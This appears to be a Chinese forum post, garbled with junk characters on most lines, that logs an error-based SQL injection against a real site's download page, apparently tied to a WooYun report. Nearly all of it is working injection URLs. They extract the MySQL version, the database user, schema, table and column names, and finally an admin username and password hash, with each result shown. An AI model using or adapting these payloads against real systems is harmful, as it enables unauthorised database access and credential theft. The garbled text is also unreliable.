http://www.wooyun.org/bugs/wooyun-2010-01666- O, M: t3 e% u" m9 a: u
5 B& `+ N8 E+ R8 O之前想找个测试 没想到这有 可以测试下做个记录而已
& o' a7 N a4 J& K
/ Y! q) a+ j a2 vhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
$ Y+ [1 W2 p- @. @) Q l; v# Q7 u. ?0 G+ q2 R+ g: [/ f0 g
/data0/htdocs/leqi_new/app/myapp.php
$ ?& ?9 l9 e1 T2 |% l0 o. o& N5 ^+ P H h. J5 H
或者
( X0 v* v3 ], M7 V+ R! N1 |! {9 \& U" R. n& _& z; O5 |" K
/**********version()**********/ 5.1.49-log& Q# A* Y! y) T) M
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003* J8 v$ C1 y! k' Z
}8 Z& M9 ]+ t: D+ R, a: P4 A/ o
/**********user()**********/ 0 V$ y# Y8 p0 |
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003% D5 h7 l, D. P$ \* ^" W5 [( }0 V1 e9 I
. z( \# f% e" H: `+ ~, K
/**********database()**********/ leqi A; j' P7 M: y' X( y7 B# a
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
+ z% i- X0 O7 C0 B% {* x" o, d4 s( {6 E% i9 s" j
/**********limit依次递归爆库**********/
& T9 [4 M- h' P, j) N) B: m) x0 ^http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003/ V! F' C+ w, x* B9 U9 Q- T# V; r2 w
information_schema w' Z4 ^1 F( `& o0 M8 C
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003: }+ p( v) b8 Y5 ^
leqi
4 M3 _$ c3 q6 b+ _8 A9 }$ Nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003# a8 r5 K' [; s: T8 a; p9 d8 r9 B
test
0 r$ m, E" H0 M% E; v9 U! W' [/ j& X: n! o; @0 L* }- x4 y X
/**********limit依次递归爆表名**********/$ }. ^% O/ G( L0 E+ M" r
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003: y$ o$ o- V: Q$ k) Z S! s
users
# Z$ f1 b- N. s6 I9 o0 r$ i1 z1 ^: C K6 X d+ W# i
/**********limit依次递归爆字段名**********/) t: X# `+ k: S Q, @
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
c0 n6 m( E: A( Q n) juser_id,username,nickname,passwd,group_id
0 w$ y8 N; ?. L1 P- r. t* @+ ghttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
" X' x# G# x7 ^9 r9 K/wapc/5000_0005_003) v$ E. H; x9 ^1 C( O8 o
11 21
" N0 r- C. H0 ?. V- \. q$ ~http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
! f8 K2 |$ w: \9 E) Z: H/wapc/5000_0005_003
& G5 N: a: j) a# G5 w7 Q* j11 341 351 361
$ w& ]; E. c9 L" y, I/**********爆数据**********/
4 s& d: n( }$ p5 J4 R- Dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
, M3 p5 z( D; N6 P: Y$ Z Fadmin* g; ?$ r7 c- s' z# W7 q9 [5 y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/ K9 ?8 U! @2 n. ~* T9 x
6a8b4574ca231eb8bd52764d4978ffcd3 j/ J7 l, G- O8 l% m
. d8 a3 Y+ H7 K- M
" t+ N& N# F/ k, X
|